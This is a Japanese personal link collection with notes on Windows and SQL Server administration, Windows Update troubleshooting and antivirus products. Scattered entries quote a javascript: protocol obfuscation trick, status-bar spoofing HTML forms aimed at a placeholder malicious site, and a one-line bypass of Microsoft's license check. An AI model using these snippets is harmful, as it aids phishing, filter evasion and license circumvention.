Windows XP または Windows Server 2003 セットアップ後の HAL オプション
http://support.microsoft.com/default.aspx?scid=kb;ja;309283
Windows XP Service Pack 2、Windows XP Tablet PC Edition 2005および Windows Server 2003 のデータ実行防止 (DEP) 機能の詳細
http://support.microsoft.com/default.aspx?scid=kb;ja;875352
Windows XP ベース、および Windows 2000 ベースのコンピュータからファイル サーバー上の共有フォルダにファイルを保存できない
http://support.microsoft.com/default.aspx?scid=kb;ja;895900
Windows Server 2003 R2 のサイトオープン
http://go.microsoft.com/?linkid=3765248
[HOWTO] Windows Server 2003 で SNMP サービスのネットワーク セキュリティを構成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;324261
Windows Server 2003 でファイアウォール クライアントと Web プロキシ クライアントの自動検出を構成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;816320
Windows XP の Sysprep の新機能
http://support.microsoft.com/default.aspx?scid=kb;ja;282190
[BUG] プロトコルとして TCP/IP のみが指定されている場合にSQL Server が TCP/IP ソケットで受信待ちをしないことがある
http://support.microsoft.com/default.aspx?scid=kb;ja;306865
[FIX] 証明機関の名前が Windows 2000 コンピュータのホスト名と同じ場合に SQL Server 2000 に接続できない
http://support.microsoft.com/default.aspx?scid=kb;ja;302409
[HOWTO] SQL Server 2000 のインストール方法 - ローカルへの基本インストール
http://support.microsoft.com/default.aspx?scid=kb;ja;303747
Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;316898
SQL Server の 8198 エラーのトラブルシューティング方法
http://support.microsoft.com/default.aspx?scid=kb;ja;834124
SQL Server 2000 の sysprocesses テーブル内の waittype 列および lastwaittype 列
http://support.microsoft.com/default.aspx?scid=kb;ja;822101
[FIX] Server サービスが実行されていないと MSDE 2000 をインストールできない
http://support.microsoft.com/default.aspx?scid=kb;ja;829386
Windows Server 2003 起動時に DFS サービスの起動に失敗する
http://support.microsoft.com/default.aspx?scid=kb;ja;902038
Windows Server 2003 で TCP/IP フィルタリングを構成する方法
http://support.microsoft.com/kb/816792/ja
ネットワーク運用におけるセキュリティ:まずはセキュリティの基本的な考え方から理解する
http://www.itmedia.co.jp/enterprise/articles/0508/12/news031.html
解説:ドメイン乗っ取り問題とは何か?
http://www.itmedia.co.jp/enterprise/articles/0508/12/news002.html
情報漏えい対策ガイド (Windows 編)
http://www.exconn.net/Blogs/team02/archive/2005/08/19/2514.aspx
Windows 2000 Server の TCP/IP の脆弱性と対策
http://www.microsoft.com/japan/technet/security/guidance/secmod150.mspx
簡易ファイルの共有および ForceGuest についての説明
http://go.microsoft.com/?linkid=3878881
Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法
http://go.microsoft.com/?linkid=3875308
905226: Windows XP または Windows 2000 Professional の確認時に Windows Genuine Advantage (正規 Windows 推奨プログラム) の確認処理が完了しない (Microsoft)
http://support.microsoft.com/default.aspx?scid=kb;ja;905226
マルチタスク対応Javaアプリケーションの作成
http://japan.internet.com/developer/20050822/27.html
柔軟な.NET構成セクションハンドラ(.config)の作成
http://japan.internet.com/developer/20050822/26.html
第1回:実環境テストの必要性/導入前にテストをしよう
http://www.pc-view.net/Security/050818/index.html
第2回:侵入防御をチェックする/内部向けへの防御
http://www.pc-view.net/Security/050818/page2.html
[HOWTO] Windows XP で高度なクリーン ブート トラブルシューティングを実行する
http://support.microsoft.com/default.aspx?scid=kb;ja;316434
Windows でカーネル モードのフィルタ ドライバを一時的に無効にする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;816071
Driver Verifier を使用して Windows ドライバをトラブルシューティングする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;244617
Windows サーバー オペレーティング システムの既知のセキュリティ識別子
http://support.microsoft.com/default.aspx?scid=kb;ja;243330
IPAとNRIセキュア、米NISTのセキュリティ情報を日本語で一般公開
http://internet.watch.impress.co.jp/cda/news/2005/08/29/8932.html
海外情報セキュリティ関連文書の翻訳・調査研究(NIST文書など) (IPA)
http://www.ipa.go.jp/security/publications/nist/index.html
海外の情報セキュリティ関連ドキュメント (NRIセキュア)
http://www.nri-secure.co.jp/news_alert/report/nist/nist_report.html
Windows XP および Windows Server 2003 の Boot.ini ファイルで使用可能なスイッチ オプション
http://support.microsoft.com/default.aspx?scid=kb;ja;833721
[INF] SQL Server 2000 のデータベース コピー ウィザードの説明とトラブルシューティング
http://support.microsoft.com/default.aspx?scid=kb;ja;274463
クラスタ化されていない Windows 2000 Server に MSDTC を再インストールする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;279786
ゲート、車載向けのHDDプレーヤー自作キット−シガーソケット給電に対応。車載用リモコン付属
http://www.watch.impress.co.jp/av/docs/20050804/gate.htm
夜になるとネットワークが遅くなる?
http://www.atmarkit.co.jp/fnetwork/rensai/troutol10/01.html
Windows Server 2003 におけるシャットダウン時の問題のトラブルシューティング
http://support.microsoft.com/default.aspx?scid=kb;ja;324268
アレイ コントローラのインストール後、Windows Server 2003 が応答を停止する
http://support.microsoft.com/default.aspx?scid=kb;ja;823728
[HOWTO] Windows Server 2003 でインターネット インフォメーション サービスの Web 認証を構成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;324276
Windows Server 2003 のワークグループでネットワーク経由でファイルとフォルダを共有する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;323420
[HOWTO] Windows Server 2003 のデバイス マネージャに表示される不明なデバイスのトラブルシューティングの方法
http://support.microsoft.com/default.aspx?scid=kb;ja;327756
[INF] よく寄せられる質問 - SQL Server 2000 - table 変数
http://support.microsoft.com/default.aspx?scid=kb;ja;305977
[HOWTO] SQL Server で tempdb データベースを圧縮する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;307487
プールが無効な場合の SQL Server ドライバ用の TCP/IP 設定
http://support.microsoft.com/default.aspx?scid=kb;ja;328476
SQL Server 2000 ローカル データベースのネットワーク接続をセキュリティで保護する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;814130
Windows XP Professional の高速ログオン最適化機能について
http://support.microsoft.com/default.aspx?scid=kb;ja;305293
Windows Server 2003 で MS-DOS ネットワーク起動ディスクを作成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;325848
Windows Server 2003 でクライアントをターミナル サービスに接続する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;814585
Windows Server 2003 で移動ユーザー プロファイルを作成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;324749
Windows Server 2003 のシステムおよびブート パーティションをミラー化する方法 (RAID1)
http://support.microsoft.com/default.aspx?scid=kb;ja;323432
JVN、RSSによる脆弱性対策情報の配信をスタート
http://www.itmedia.co.jp/enterprise/articles/0509/09/news052.html
Orca データベース エディタを使用して Windows インストーラ ファイルを編集する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;255905
SQL CLR vs. Transact-SQLの真実 SQL Server 2005 CTPレビュー(開発者編)
http://www.atmarkit.co.jp/misc/ct.php?id=ws590701
Windows Media Player のマルチメディア ファイル形式
http://support.microsoft.com/default.aspx?scid=kb;ja;316992
独自のパラメータとコマンドを使う
http://msdn.microsoft.com/library/ja/wmplay/mmp_sdk/tousecustomtagsandcommands.asp
ASX ファイルは PARAM 要素を使って独自に拡張出来たのか・・・ AJAX 使った操作が楽になるかな。
セキュリティ情報 RSS Part2
http://www.exconn.net/Blogs/team02/archive/2005/09/06/2910.aspx
906522: 通常とは異なる記述の javascript: プロトコルが実行される
http://support.microsoft.com/kb/906522/JA/
javasc%26amp%3b%2309%3bript
↓
javasc	ript
↓
javasc ript
↓
javascript
と、いう事らしい。
IEやOperaにステータス・バーを偽装できる問題
http://itpro.nikkeibp.co.jp/article/NEWS/20051117/224750/
IE
<form action="[malicious site]">
<a href="[trusted site]"><input type="image" src="[image]"></a>
</form>
OPERA
<form action="[malicious site]">
<a href="[trusted site]"><input type="image" src="[image]" title="[trusted site]"></a>
</form>
Internet Explorer 6 の使用に役立つリソース
http://support.microsoft.com/default.aspx?scid=kb;ja;867470
UNICODE バグ
http://rocketeer.dip.jp/unicode/index.htm
Windows 2000 Server の TCP/IP の脆弱性と対策
http://www.microsoft.com/japan/technet/security/guidance/secmod150.mspx
簡易ファイルの共有および ForceGuest についての説明
http://go.microsoft.com/?linkid=3878881
情報漏えい対策ガイド (Windows 編) 提供開始
http://go.microsoft.com/?linkid=3875293
Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法
http://go.microsoft.com/?linkid=3875308
Windows XP または Windows Server 2003 でファイルを検索しようとすると、Explorer.exe プロセスが予期せず終了することがある
http://support.microsoft.com/kb/900004/ja
Windows Server 2003 へのアップグレード中にブート パーティションを拡張する方法
http://support.microsoft.com/kb/325857/ja
Windows Server 2003 で統合ルートをサポートするための分散ファイル システムの更新プログラム
http://support.microsoft.com/kb/829885/ja
実用的になったディスククォータ機能
http://www.atmarkit.co.jp/fwin2k/special/2003r2_02/2003r2_02_01.html
第6回 アクセス・ベースのディレクトリ列挙ABE 3.ABEツールの利用方法
http://www.atmarkit.co.jp/fwin2k/special/2003sp1_06/2003sp1_06_03.html
http://www.microsoft.com/downloads/details.aspx?FamilyId=04A563D9-78D9-4342-A485-B030AC442084&displaylang=en
Tips:業務に不要なプログラムの実行をグループ・ポリシーで禁止する
http://www.atmarkit.co.jp/fwin2k/win2ktips/631rejectexec/rejectexec.html
Windows Server 2003 でソフトウェアの制限のポリシーを使用する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;324036
ハッシュの規則を作成する
http://www.microsoft.com/resources/documentation/windowsserv/2003/standard/proddocs/ja-jp/SRP_hash.asp
共有パソコンをMS製無償ツールで保護する方法
http://itpro.nikkeibp.co.jp/article/COLUMN/20060717/243484/
OSを自作する時代がやってきた
http://itpro.nikkeibp.co.jp/article/OPINION/20060721/243952/
Windows Update 関連のエラー
Windows Update version 5 にて更新プログラムをインストールする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;873475
Windows Update version 5 に関してよく寄せられる質問について http://support.microsoft.com/default.aspx?scid=kb;ja;873476
Windows Update に関する技術情報
Windows Update サイトにアクセスしようとすると 0x80072EFD エラーが表示される
Windows Update サイトにアクセスしようとすると、0x800B0001 エラーが表示されます。
Windows Update サイトで利用可能な更新を検索すると 0x80248011 エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 検索中に 0x800A01AD エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 0x80244001 エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 0x80070002 エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 0x8007043B エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 0x800A0046 エラーが表示される
Windows Update サイトで利用可能な更新を検索すると 検索中に 0x80072F8F エラーが表示される
Windows Update でエラー番号 0x800A01AE が表示される
Windows Update サイトにアクセスすると 0x80245003 エラーが表示される
Windows Update でエラー番号 0x800C0005 が表示される場合の対処方法
Windows Update サイトにアクセスしようとすると 0x80072EFD エラーが表示される
プロキシサーバーを利用して Windows Update にアクセスすると "エラー 0x80072EFD" が表示される
Windows Update でエラー番号 0x8024402C が表示される場合の対処方法
Windows Update サイトで利用可能な更新を検索すると 0x80244001 エラーが表示される
Windows Update でエラー番号 0x80070424 が表示される場合の対処方法
Windows Update でエラー番号 0x80072EE2 が表示される場合の対処方法
Windows Update でエラー番号 0x800A01AD が表示される場合の対処方法
Windows Update でエラー番号 0x80240030 が表示される場合の対処方法
Windows Update でエラーが発生した場合のエラー番号について
Windows Update でエラー番号 0x8024502D が表示される場合の対処方法
Windows Update サイトにアクセスしようとすると 0x8DDD0004 エラーが表示されます
Windows Update サイトで利用可能な更新を検索すると 0x80248011 エラーが表示される
Windows Update でエラー番号 0x800A138F が表示される場合の対処方法
Windows Update version 5 関連のサポート技術情報一覧
http://support.microsoft.com/default.aspx?scid=kb;ja;875571
Windows Update version 5 の総合情報
http://support.microsoft.com/default.aspx?scid=kb;ja;873474
Windows Update version 5 にて更新プログラムをインストールする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;873475
Windows Update トラブルシューティングの使い方
http://support.microsoft.com/default.aspx?scid=kb;ja;873479
Windows Update Web Web サイトでアクセスするとき、エラー「 0x8007041D」を表示します。
http://support.microsoft.com/kb/902322/ja
Windows Update でエラー番号 0x800A01AE が表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;885963
機能していなかったり Windows Update。
http://support.microsoft.com/default.aspx?scid=kb;ja;555989
パソコン用語 - Windows Update (ウィンドウズ アップデート) とは
http://support.microsoft.com/default.aspx?scid=kb;ja;878554
利用している Windows Update のバージョンを確認するには
http://support.microsoft.com/default.aspx?scid=kb;ja;875569
Windows Update version 4 から Windows Update version 5 への移行について
http://support.microsoft.com/default.aspx?scid=kb;ja;875568
Windows Update でエラー番号 0x800C0005 が表示される場合の対処方法
http://support.microsoft.com/default.aspx?scid=kb;ja;834406
Windows Update v5 で更新プログラムの非表示と復元を設定する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;875570
Windows Update カタログ から Windows の更新を取得する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;418435
907436: Windows Genuine Advantage を利用する際のセキュリティ設定
http://support.microsoft.com/kb/907436/JA/
あとはここで。
Boing Boing: Microsoft "Genuine Advantage" cracked in 24h: window.g_sDisableWGACheck='all'
http://www.boingboing.net/2005/07/28/microsoft_genuine_ad.html
Windows Update を行う前にアドレスバーに javascript:void(window.g_sDisableWGACheck='all') と打ち込むとチェックをすり抜けるって話。
-------------------------------------------------------------------------------------------------------------
Windows Server Word 12月号より
http://www.windows-world.jp/project/
イベントログに「Automatic Updates サービスは起動時に停止しました」
と出ている場合は、「Windows Update Agent2.0」が正しく機能していない
(一部のファイルが無いか破損している場合等)と考えられます。
この場合、Windows Update Agent2.0 を再インストールすると修復出来る
可能性があります。
Windows Update V6 を利用するにはさらに
・Windows Installer3.1
・バックグラウンドインテリジェント転送サービス(BITS2.0)
が必要です。
■Windows Update Agent2.0(WindowsXP/Server2003 x86版)
http://go.microsoft.com/fwlink/?LinkId=43264
■Windows Update Agent2.0(WindowsXP/Server2003 x64版)
http://go.microsoft.com/fwlink/?LinkId=43265
■Windows Update Agent2.0(WindowsXP/Server2003 Itanium版)
http://go.microsoft.com/fwlink/?LinkId=42538
■Windows Installer3.1 Redistributable(v2) - 日本語
http://www.microsoft.com/downloads/details.aspx?familyid=889482FC-5F56-4A38-B838-DE776FD4138C&displaylang=ja
■Windows2000用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773)
http://www.microsoft.com/downloads/details.aspx?familyid=3EE866A0-3A09-4FDF-8BDB-C906850AB9F2&displaylang=ja
■WindowsXP用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773)
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyId=B93356B1-BA43-480F-983D-EB19368F9047
■Windows Server2003用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773)
http://www.microsoft.com/downloads/details.aspx?familyid=3FD31F05-D091-49B3-8A80-BF9B83261372&displaylang=ja
Windows Update Agent2.0 を再インストールする場合
そのまま実行しても動きませんので、以下手順で再インストール
1.サービスから、Automatic Updates を自動から手動に変更し
(これは、再インストール後に自動で戻ります)再起動。
2.「/wuforce」オプション付きでインストール
(これは、既にセットアップされている Windows Update Agent2.0 が
存在しても強制的にインストールする為のオプション)
コマンドから、 WindowsUpdateAgent20-x86.exe /wuforce
3.必要に応じて Installer3.1 と BIT2.0 をインストール。
Windows 2000 の場合はたぶんこれ
http://support.microsoft.com/kb/937364/
■Office 2003 がインストールされている PC で CPU負荷 100% になる件
サポート技術情報 937383 Microsoft Update または Windows Update が終了しない
http://support.microsoft.com/kb/937383/ja
解決方法は、KB927891 修正モジュールと Windows Update Agent (WUA) 3.0 client の両方をインストール
KB927891
http://support.microsoft.com/kb/927891
WUA 3.0 client
http://support.microsoft.com/kb/937383/ja
関連
@police-Microsoft Update または Windows Update が終了しない現象について
http://www.cyberpolice.go.jp/important/2007/20070511_162231.html
Microsoftのアップデートに不具合、CPU使用率が100%近くに
http://www.itmedia.co.jp/news/articles/0705/12/news010.html
自動更新などでOfficeパッチが配布されると svchosts.exe がおかしくなる不具合、修正プログラムあり?(KB927891)
http://bbs.hotfix.jp/ShowPost.aspx?PostID=6485
WSUS配下でCPU使用率100%
http://www.exconn.net/Forums/ShowPost.aspx?PostID=11753
Windows Server Update Services は、 Windows Server 2003 での大きな Windows 更新ファイルはダウンロードできません。
http://support.microsoft.com/kb/888303/ja
Microsoft Update の利用を中止するには
http://support.microsoft.com/kb/902297
Windows Update に関する技術情報
http://support.microsoft.com/kb/884101
Windows Update Web サイトまたは Microsoft Update Web サイトで利用可能な更新プログラムを検索するとエラー メッセージが表示される
http://support.microsoft.com/kb/883821
Windows Vista および Windows Server 2008 用のシステム更新準備ツールについて
http://support.microsoft.com/kb/947821
Windows 7/Server 2008のWindows Updateの使い方(基本編)
http://www.atmarkit.co.jp/fwin2k/win2ktips/1227w7wup1/w7wup1.html
Windows Update に毎回 同じ物が表示される場合の対策
Windows Update サイトの "更新の一覧" にインストールした更新の選択が再度表示される場合がある
Windows Update 設定をリセットする方法はでしょうか。
コマンドから
rem サービス停止
net stop bits
net stop wuauserv
rem qmgr*.dat ファイルを削除
Del \Programdata\Microsoft\network\downloader\qmgr*.dat
rem ファイルを再登録
cd/d %windir%\system32
regsvr32.exe atl.dll
regsvr32.exe urlmon.dll
regsvr32.exe mshtml.dll
regsvr32.exe shdocvw.dll
regsvr32.exe browseui.dll
regsvr32.exe jscript.dll
regsvr32.exe vbscript.dll
regsvr32.exe scrrun.dll
regsvr32.exe msxml.dll
regsvr32.exe msxml3.dll
regsvr32.exe msxml6.dll
regsvr32.exe actxprxy.dll
regsvr32.exe softpub.dll
regsvr32.exe wintrust.dll
regsvr32.exe dssenh.dll
regsvr32.exe rsaenh.dll
regsvr32.exe gpkcsp.dll
regsvr32.exe sccbase.dll
regsvr32.exe slbcsp.dll
regsvr32.exe cryptdlg.dll
regsvr32.exe oleaut32.dll
regsvr32.exe ole32.dll
regsvr32.exe shell32.dll
regsvr32.exe initpki.dll
regsvr32.exe wuapi.dll
regsvr32.exe wuaueng.dll
regsvr32.exe wuaueng1.dll
regsvr32.exe wucltui.dll
regsvr32.exe wups.dll
regsvr32.exe wups2.dll
regsvr32.exe wuweb.dll
regsvr32.exe qmgr.dll
regsvr32.exe qmgrprxy.dll
regsvr32.exe wucltux.dll
regsvr32.exe muweb.dll
regsvr32.exe wuwebv.dll
rem Winsock をリセット
netsh reset winsock
rem ↓XP, Server 2003 を実行している場合
proxycfg.exe -d
rem サービス再起動
net start bits
net start wuauserv
rem ↓Vista, Server 2008 を実行している場合
bitsadmin.exe/reset/allusers
0x643 or 0x80070643 が出る場合。
.NET Framework が壊れているので .Net Cleanup Utility を使って .NET Framework をアンインストールする。
When installing updates using Windows update or Microsoft Update you may receive Error 0x643 or 0x80070643
http://support.microsoft.com/kb/976982/
Patch Registration Cleanup Tool について
http://support.microsoft.com/kb/976220
更新プログラムの登録の不正または破損に関連する問題を解決することができるツールで
更新プログラムを再インストールできるように戻すことができる。
「国内ユーザーの40人に1人がボットに感染」――Telecom-ISACなどが調査
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050727/165402/
スパイウエアを捕まえろ(特集)
http://arena.nikkeibp.co.jp/tokushu/gen/20050629/112654/
って事でオンラインでチェック出来るサイトを探しました。
X-Cleaner
http://www.shareedge.com/spywareguide/txt_onlinescan.php
ウイルスチェック、駆除出来るサイト
http://www.pandasoftware.com/products/activescan/com/activescan_principal.htm
日本語は http://www.pandasoftware.jp/ から左の「Panda ActiveScan」から可能です。
単体のファイルがウイルスに感染してないかチェックを行う場合は
http://www.virustotal.com/flash/index_en.html
が良いでしょう。
select file にファイルを仕込んで Send を押すだけです。
※有名メーカのアンチウイルスはスキャンのみで駆除してくれません。
トレンドマイクロ オンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
シマンテック・セキュリティチェック
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym
マカフィー フリースキャン
http://www.so-net.ne.jp/option/security/freescan-jp/mfs/FreeScan_EULA_Page.htm
Kaspersky Labs - オンラインスキャン
http://www.kaspersky.co.jp/scanforvirus/
など。。。
アンチウイルス検出性能比較
http://www.virus.gr/english/fullxml/default.asp?id=69&mnu=69
Kaspersky が最強ですね。日本の代理店がやる気なさそうなのが問題ですが・・・
6になって、ジャストシステムになりました。早速サポートしてもらった訳ですが、、、
5から6へのアップデートが以外とややこしい(バックアップキーを持っている場合は注意)
で、いきなりアップデートでトラブルが、、、
定義ファイル更新トラブル発生のお詫びと対処方法について
http://www.just-kaspersky.jp/support/faq01.html
ウイルス対策ソフト「カスペルスキー」製品情報:JUST Kasperskyポータル
http://www.just-kaspersky.jp/products/
AV-Comparatives
http://www.av-comparatives.org/index.html?http://www.av-comparatives.org/seiten/comparatives.html
http://www.av-comparatives.org/seiten/ergebnisse/report11.pdf
ウイルス対策ソフトウエアの性能比較記事にもの申す!(前編)
http://blog.nikkeibp.co.jp/pconline/security/2006/11/sonoda003.html
アンチウイルスに関しては、MS が認定している製品使うのが安心ですね。
Microsoft Windows セキュリティ センターのウイルス対策パートナー
http://www.microsoft.com/athome/security/viruses/wsc/ja/default.mspx
マイクロソフト、家庭向けフィルタリングソフトを無償提供
http://japan.cnet.com/news/sec/story/0,2000056024,20320927,00.htm
マイクロソフト,企業向けのセキュリティ対策製品を提供開始へ
http://itpro.nikkeibp.co.jp/article/NEWS/20061124/254803/
マイクロソフト,企業向けウイルス対策製品をいよいよ国内投入
http://itpro.nikkeibp.co.jp/article/NEWS/20061124/254804/
Windows Server 2003、Windows 2000、または Windows XP を実行しているコンピュータでウイルス スキャンを行う場合の推奨事項
http://support.microsoft.com/kb/822158/ja
Windows Defender
http://www.microsoft.com/japan/athome/security/spyware/software/default.mspx
スパイウェア対策はいまだ不十分――米調査
http://www.itmedia.co.jp/enterprise/articles/0611/14/news016.html
スパイウェア対策ツールは、複数使うべきだと思う - 「走れ!プロジェクトマネージャー!」
http://blogs.itmedia.co.jp/tooki/2006/11/post_a93d.html?ref=rssall
スパイウェア リスト
http://www.shareedge.com/spywareguide/product_list_full.php?category_id=43
SystemDoctor
http://internet.watch.impress.co.jp/cda/news/2006/09/05/13196.html
DriveCleaner
http://itpro.nikkeibp.co.jp/article/NEWS/20061012/250564/
You Tube に表示される、アレ。2006.11.16
YouTube上にも登場、詐欺的セキュリティソフトへ誘導するバナー広告
http://internet.watch.impress.co.jp/cda/news/2006/10/18/13656.html
と比べると、日本語力がアップしてます。
多様化したネット上の押し売り/志茂田景樹さん<2>
http://arena.nikkeibp.co.jp/col/20060925/118911/
今後はこっちの手口が増えそうなのかな。(もう古い)
YouTubeの怪−−99万9999人目で20万円当選
http://blog.nikkeibp.co.jp/pconline/editor/archives/2006/11/post_57.html
【レポート】あなたの周りのネットセキュリィ - 詐欺サイトに釣られるリアルな瞬間
http://journal.mycom.co.jp/articles/2006/11/24/netsecurity/
「おめでとう!当選です」「エラーを検出しました」---バナー広告の罠に注意
http://itpro.nikkeibp.co.jp/article/NEWS/20061204/255816/
「おめでとう!あなたは999999番目の訪問者です」別サイトへ誘導する“罠”に注意
http://itpro.nikkeibp.co.jp/article/NEWS/20061201/255686/
こんどはこっち。
「ページを表示できません」,偽のエラー・ページでソフトを“押し売り”
http://itpro.nikkeibp.co.jp/article/NEWS/20061205/256023/
アドウェアインストールあの手この手、今度は「エラー表示」を装う手口
http://www.itmedia.co.jp/enterprise/articles/0612/04/news068.html
スパムを撃退するにはまず中身を知れ
http://techtarget.itmedia.co.jp/tt/news/0612/06/news03.html
スパムの基本知識が判ります。(無料のユーザ登録が必要)
脅威,すべてはWebアクセスから始まる
第3回 通用しなくなった「80番ポートの安全神話」
http://itpro.nikkeibp.co.jp/article/COLUMN/20071005/283909/
ノーガードサイトの見分け方
http://pc.nikkeibp.co.jp/article/NPC/20070614/274780/?set=ml
ちょっとした予防策として。。。
scandoo
http://g.s.scandoo.com
Google の代わりに代用
サイトの危険性を警告してくれます。
詳しくは下記記事を
プラグインなしでサイトの危険性を警告する「Scandoo」--ベータがまもなく発表へ
http://japan.cnet.com/news/sec/story/0,2000056024,20112807,00.htm
プラグインの場合は、マカフィサイトアドバイザー等が在ります。
ルートしかチェックしてないようで、微妙ですけど。。。
2007.12.5 時点でインストール時に SITEADV.EXE がリスクウェア「Trojan.generic」の亜種として検知されます。
サイトもバグが・・・>Mod_python error: "PythonHandler mod_python.psp"
マカフィーの無料のWebサイト安全性評価ツール,ダウンロード数が3800万件超える
http://itpro.nikkeibp.co.jp/article/NEWS/20070319/265652/
ネットクラフトのアンチフィッシングツールバー
http://news.netcraft.com/
リンク先のウイルスチェックに Dr.Web のプラグイン。
ブラウザに組み込む無償ウイルス対策ツール「Dr.WEB リンクチェッカー」
http://internet.watch.impress.co.jp/cda/news/2006/10/12/13599.html
あとは aguse.net 辺りを…
aguse.net
http://www.aguse.net/
そういえば、YAHOO の検索結果に ブックマーク数出るようになってますね。
いつからだろう。。。
2006年のヒット商品番付、「ウイルスセキュリティZERO」が東前頭6枚目に
http://internet.watch.impress.co.jp/cda/news/2006/12/05/14136.html
うわ〜、みんな更新無料の罠にはまってますよ…
今流行っているウイルス(WildList)監査で、5つに1つの割合で見逃す
アンチウイルスなんて欠陥商品でしょう。なんで問題にならないかなぁ...
http://www.nikkeibp.co.jp/sj/special/185/04.html
WildList
http://www.wildlist.org/WildList/
このリストには世界中に散らばるウイルス研究者が「実際にフィールドから受け取ったウイルス」が掲載されています。
ウイルス対策製品の検出の正確さを図る指標である「Virus Bulletin( http://www.virusbtn.com/index )」のテストにも用いられています。
ウイルス対策に近道なし、基本は一にも二にも「教育」
http://www.itmedia.co.jp/enterprise/articles/0501/20/news093.html
古い定義ファイル・エンジンで、ウイルスはどれだけ検出できるのか - アンチウイルスソフト評価
http://blog.lucanian.net/archives/50855056.html
園田道夫「蔵出しセキュリティ」 : ウイルス対策ソフトウエア、こんなテスト手法はいかが?
http://blog.nikkeibp.co.jp/pconline/security/2006/12/sonoda005.html
ウイルス対策ソフト比較 version 2007
http://www10.plala.or.jp/palm84/antivirus.html
中堅・中小企業の業務アプリ利用実態(3)ウイルスバスターのトップは当分安泰
http://itpro.nikkeibp.co.jp/article/COLUMN/20061122/254538/
手口が巧妙化! 検挙率も下がってきている〜カスペルスキー氏に聞く「ネット犯罪」の今<1>
http://arena.nikkeibp.co.jp/col/20061127/119900/
ネット犯罪の凶悪化がはじまった! 日本は大丈夫か!? 〜カスペルスキー氏に聞く「ネット犯罪」の今<2>
http://arena.nikkeibp.co.jp/col/20061128/119905/
|日本のユーザーはセキュリティ対策の必要性だけでなく、対策ソフトの“質”についての意識も低いようです。
|私個人のイメージとして、日本人は製品のクオリティを重視すると思っていたので、セキュリティソフトの
|利用率やユーザー意識の現状を聞いて少し驚いています。
|今後、いかに“質”を見極めていくかが、セキュリティ意識の向上へつながっていくのではないでしょうか。
インターネットは罠だらけ
http://itpro.nikkeibp.co.jp/article/OPINION/20061211/256503/
検索エンジンに潜む危険! アダルト用語でサーチ / 無料の文句に甘い罠も
http://journal.mycom.co.jp/news/2006/12/12/008.html
【楽天ブログ】おすすめリンクに潜む出会い系サイトの罠 「楽天様にもの申す。(6660)」
http://plaza.rakuten.co.jp/nahatektek/diary/200703290000/
「雪だるまレース」懸賞 @Seesaa広告
http://blog.ptlabo.net/index.php?id=06120116
[364] 出会い系釣上げ懸賞&占い対策専用スレ
http://bbs02.kogumaneko.tk/patio.cgi?mode=view&no=364
いくら警告してもセキュリティ対策が進まない理由
http://www.itmedia.co.jp/enterprise/articles/0704/24/news005.html
ハッカーがネットワークに侵入する方法
http://www.microsoft.com/japan/technet/technetmag/issues/2005/01/anatomyofahack/default.mspx
・侵入されたシステムに更新プログラムを適用して、システムをきれいな状態にすることはできません。
更新プログラムは脆弱性を取り除くだけにすぎません。
・バックドアを削除して、侵入されたシステムをきれいな状態にすることはできません。
・ある種の"脆弱性削除ツール" を使用して、侵入されたシステムをきれいな状態にすることはできません。
・ウイルススキャナを使用して、侵入されたシステムをきれいな状態にすることはできません。
・既存のインストールにオペレーティングシステムを上書きで再インストールしても、
侵入されたシステムをきれいな状態にすることはできません。
・侵入されたシステムからコピーしたデータは、信用できません。
・侵入されたシステムに関するイベントログは信用できません。
・最後に行われたバックアップを信用できない場合があります。
侵入されたシステムをきれいな状態にする唯一の正しい方法は、システムをフラットにし、再構築することです。
「再インストールしかない」ならアンチウイルスの価値って???
アンラボ、世界で初めてセキュリティソフトウェア3製品が商用最高レベルEAL4コモンクライテリア獲得
http://www.value-press.com/pressrelease.php?article_id=17726&medium_id=969
一般的なアンチウイルスより動作が軽いらしい。
アマゾンのでの評価は高い。
ウイルス対策ソフト|クチコミランキング
http://kuchiran.jp/pc/security.html
を見ると、売れているのは
・ウイルスバスター
・ノートン
・ウイルスセキュリティZERO
・マカフィ
のようです。
ちなみに最近は 3 台まで OK とかありますけど、出来れば違うアンチウイルス入れた方が良いかと。
そのアンチウイルスで検出されなくても別のアンチウイルスで検出されたりする場合もありますし。
秘匿を「ひじゃく」と読む会社のセキュリティは大丈夫か?
http://www.nikkeibp.co.jp/style/biz/skillup/spam/071029_67th/
「ITセキュリティは欠陥品市場」――セキュリティ専門家が警鐘
http://www.computerworld.jp/news/sec/84011.html
必ずしも売れている製品がいい製品とは限りませんって事で、、、
TV やマスコミの情報も話半分で。
セキュリティベンダー「G DATA」が日本市場3カ年計画
http://internet.watch.impress.co.jp/cda/news/2007/12/06/17772.html
今の自分の知識がどれ位か試してみた。
応用コース テクニカル編
http://www.sea-j.net/curriculum/technical.html
